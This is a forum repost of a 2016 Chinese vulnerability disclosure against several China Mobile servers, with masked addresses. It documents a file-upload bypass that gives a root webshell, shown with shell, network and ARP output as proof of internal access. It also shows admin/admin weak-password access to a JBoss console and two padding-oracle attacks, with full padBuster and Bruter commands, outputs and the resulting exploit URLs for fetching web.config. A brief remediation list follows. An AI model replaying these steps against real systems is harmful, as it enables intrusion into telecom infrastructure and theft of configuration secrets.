HanDs
管理员

[7月漏洞公开] 运营商安全之中国移动多个漏洞打包(可SHELL内网漫游) 



RT

详细说明:

#1 文件上传漏洞

##1.1 证明属于中国移动 http://**.**.**.**/profile/create, 并点击注册

1-1.png



##1.2 文件上传, 上传jpg, 截包后缀名修改为jsp, 从而实现绕过

1-2.png



##1.3 上传成功, 获取Shell

http://**.**.**.**/data/images/2016/05/22/20160522105415_4611.jsp

code 区域
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root



code 区域
eth0      Link encap:Ethernet  HWaddr 00:50:56:8C:7D:53  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fe8c:7d53/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6135649371 errors:0 dropped:0 overruns:0 frame:0
TX packets:10647266306 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:952335725793 (886.9 GiB) TX bytes:13808412065401 (12.5 TiB)

eth1 Link encap:Ethernet HWaddr 00:50:56:8C:7D:54
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fe8c:7d54/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:62586 errors:0 dropped:0 overruns:0 frame:0
TX packets:5868 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3901571 (3.7 MiB) TX bytes:251248 (245.3 KiB)

lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:362616740 errors:0 dropped:0 overruns:0 frame:0
TX packets:362616740 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:29881800131 (27.8 GiB) TX bytes:29881800131 (27.8 GiB)



code 区域
? (**.**.**.**) at 00:00:5E:00:01:54 [ether] on eth0
? (**.**.**.**) at 02:1F:A0:00:00:21 [ether] on eth0
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth1
? (**.**.**.**) at 00:25:9E:F4:39:35 [ether] on eth0
? (**.**.**.**) at 02:16:3E:55:39:49 [ether] on eth0
? (**.**.**.**) at 7E:2C:0D:04:85:15 [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:51 [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:5C [ether] on eth0
? (**.**.**.**) at 00:1F:A0:04:D4:AC [ether] on eth0
? (**.**.**.**) at 00:50:56:8C:7D:55 [ether] on eth0
? (**.**.**.**) at 02:16:3E:50:0E:A1 [ether] on eth0



1-3.png



#2 服务器后台匿名访问

##2.1 http://**.**.**.**:3380/

1-4.png



1-5.png



##2.2 弱口令进入

http://**.**.**.**:3380/admin-console/login.seam?conversationId=96

admin\admin

1-6.png



##2.3 证明危害

**.**.**.**:3380/is/index.jsp 023

code 区域
eth0      Link encap:Ethernet  HWaddr FA:16:3E:1E:6E:B8  
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::f816:3eff:fe1e:6eb8/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4026126721 errors:0 dropped:0 overruns:0 frame:0
TX packets:4603968084 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1079154466212 (1005.0 GiB) TX bytes:1287649748420 (1.1 TiB)

lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:569904 errors:0 dropped:0 overruns:0 frame:0
TX packets:569904 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:41959898 (40.0 MiB) TX bytes:41959898 (40.0 MiB)



code 区域
? (**.**.**.**) at fa:16:3e:24:51:c2 [ether] on eth0
? (**.**.**.**) at 00:00:5e:00:01:70 [ether] on eth0



1-7.png



#3 Padding Oracle Attack两枚

http://**.**.**.**/页面上就有, 不写了, 相应IP为**.**.**.**

##3.1 http://**.**.**.**:8001/

code 区域
padBuster.pl http://**.**.**.**:8001/WebResource.axd?d=ZBdcbTkhb2X6pzycCd75eQ2 ZBdcbTkhb2X6pzycCd75eQ2 16 -encoding 3 -plaintext "|||~/web.config"



code 区域
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3877 N/A
2 ** 255 500 5013 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (138/256) [Byte 16]
[+] Success: (138/256) [Byte 15]
[+] Success: (249/256) [Byte 14]
[+] Success: (170/256) [Byte 13]
[+] Success: (20/256) [Byte 12]
[+] Success: (184/256) [Byte 11]
[+] Success: (87/256) [Byte 10]
[+] Success: (114/256) [Byte 9]
[+] Success: (192/256) [Byte 8]
[+] Success: (38/256) [Byte 7]
[+] Success: (205/256) [Byte 6]
[+] Success: (166/256) [Byte 5]
[+] Success: (60/256) [Byte 4]
[+] Success: (78/256) [Byte 3]
[+] Success: (163/256) [Byte 2]
[+] Success: (168/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 342ec0b7794fb52ba8cd2187346d1376
[+] Intermediate Bytes (HEX): 4852bcc95638d04986ae4ee952047477

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------



code 区域
Bruter.pl http://**.**.**.**:8001/ScriptResource.axd NC7At3lPtSuozSGHNG0TdgAAAAAAAAAAAAAAAAAAAAA1 16



code 区域
Total Requests:11117

Resulting Exploit Block:u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0



code 区域
http://**.**.**.**:8001/ScriptResource.axd?d=u2sJXBVvXn6B615ajjax9zQuwLd5T7UrqM0hhzRtE3YAAAAAAAAAAAAAAAAAAAAA0



1-8.png



##3.2 http://**.**.**.**:8003/

code 区域
padBuster.pl http://**.**.**.**:8003/WebResource.axd?d=t6YDFzeBpU_Lvb8TVusVCg2 t6YDFzeBpU_Lvb8TVusVCg2 16 -encoding 3 -plaintext "|||~/web.config"



code 区域
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21725

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3877 N/A
2 ** 255 500 5013 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (139/256) [Byte 16]
[+] Success: (195/256) [Byte 15]
[+] Success: (236/256) [Byte 14]
[+] Success: (119/256) [Byte 13]
[+] Success: (86/256) [Byte 12]
[+] Success: (10/256) [Byte 11]
[+] Success: (31/256) [Byte 10]
[+] Success: (248/256) [Byte 9]
[+] Success: (70/256) [Byte 8]
[+] Success: (213/256) [Byte 7]
[+] Success: (129/256) [Byte 6]
[+] Success: (1/256) [Byte 5]
[+] Success: (236/256) [Byte 4]
[+] Success: (91/256) [Byte 3]
[+] Success: (225/256) [Byte 2]
[+] Success: (112/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): fc6cd767dc0344d12e859fc1eb7e5875
[+] Intermediate Bytes (HEX): 8010ab19f37421b300e6f0af8d173f74

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------



code 区域
Bruter.pl http://**.**.**.**:8003/ScriptResource.axd _GzXZ9wDRNEuhZ_B635YdQAAAAAAAAAAAAAAAAAAAAA1 16



code 区域
Total Requests:10684

Resulting Exploit Block:VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0



code 区域
http://**.**.**.**:8003/ScriptResource.axd?d=VdrNMIWsTTg3GATJ9Hom-_xs12fcA0TRLoWfwet-WHUAAAAAAAAAAAAAAAAAAAAA0



1-9.png

漏洞证明:

已证明!

修复方案:

1、Padding Oracle Vulnerability漏洞, 安装微软官方补丁;

2、文件上传处, 重新设计, 并删除木马;

3、重新配置JBoss;

4、你们更专业


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
运营商 安全 中国移动 多个 漏洞 打包 (
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复